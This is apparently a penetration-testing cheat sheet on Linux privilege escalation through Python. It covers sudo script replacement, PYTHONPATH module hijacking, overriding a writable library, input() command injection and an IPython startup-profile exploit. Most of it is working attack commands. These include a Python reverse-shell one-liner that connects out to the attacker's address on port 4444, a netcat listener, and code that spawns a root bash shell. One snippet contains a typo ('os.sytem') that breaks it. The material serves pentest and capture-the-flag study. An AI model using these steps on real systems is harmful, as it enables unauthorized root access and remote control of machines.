# Python Privilege Escalation

Python binary is vulnerable to privilege escalation in some situations.

### Sudo PrivEsc <a href="#sudo-privesc" id="sudo-privesc"></a>

#### Replace with Arbitrary Script <a href="#replace-with-arbitrary-script" id="replace-with-arbitrary-script"></a>

```shellscript
sudo -l

(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
```

If the python script is under the current user's home directory, we can remove the script and create the new one with the same name.

```
rm -rf /home/<username>/example.py
touch /home/<username>/example.py
```

We can insert arbitrary code in the new script. For example,

```
import os;os.system('/bin/bash')
```

#### Module Hijacking <a href="#module-hijacking" id="module-hijacking"></a>

Assume the python script can be executed as root with **SETENV,NOPASSWD**.\
For example,

```
sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
```

With **SETENV**, we can change **PYTHONPATH** when executing the script, and insert malicious script to the module which is imported in the script.\
First off, check what module is imported in the python script (e.g. /opt/example.py here).

```
import random

print(random.randint(1, 8))
```

We can forge the imported module.

```
vim /tmp/random.py
```

The content of the module is below. This is a script that executes reverse shell.\
Replace **`<local-ip>`** with your local ip address.

```
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

After that, in another local terminal, start listener for getting a shell.

```
nc -lvnp 4444
```

Then run the python script with updating **PYTHONPATH** in the remote machine.

```
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py
```

By setting **"PYTHONPATH=/tmp/"**, the python script will import modules from **/tmp/** directories so the **"random"** module is imported from **/tmp/random.py**.\
Finally, we should get a shell in local terminal.

#### Module Overriding <a href="#module-overriding" id="module-overriding"></a>

If the Python script contains a module that can be modified by current user, we can inject arbitrary code into the module.\
First, check what modules the Python script uses.

```
# example.py
import random
```

Assume the **“random”** module is used in the script.\
Find the path of the module and check if it’s writable.

```
find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py
```

If we know we can modify it, inject arbitrary code in this module.\
Assume the **“random”** module path is **`/usr/lib/python3.6/random.py`**.

```
# /usr/lib/python3.6/random.py
import os;os.sytem('/bin/bash')
```

Then execute the Python script and we can spawn the root shell.

### OS Commands in input() <a href="#os-commands-in-input" id="os-commands-in-input"></a>

If you find the executable which is created in Python.\
For instance,

```
./executable

Enter some input:
```

You can enter OS commands in some input.

```
__import__('os').system('id')
```

For example,

```
./executable

Enter some input: __import__('os').system('id')
```

### IPython Privilege Escalation ([CVE-2022-21699](https://github.com/advisories/GHSA-pq7m-3gw7-gq5x)) <a href="#ipython-privilege-escalation-cve-2022-21699" id="ipython-privilege-escalation-cve-2022-21699"></a>

Interective Python (IPython) is a command shell for interective computing in multiple programming languages.

```
# -m: file mode (rwx)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py
```

### References <a href="#references" id="references"></a>

* [HackingArticles](https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/)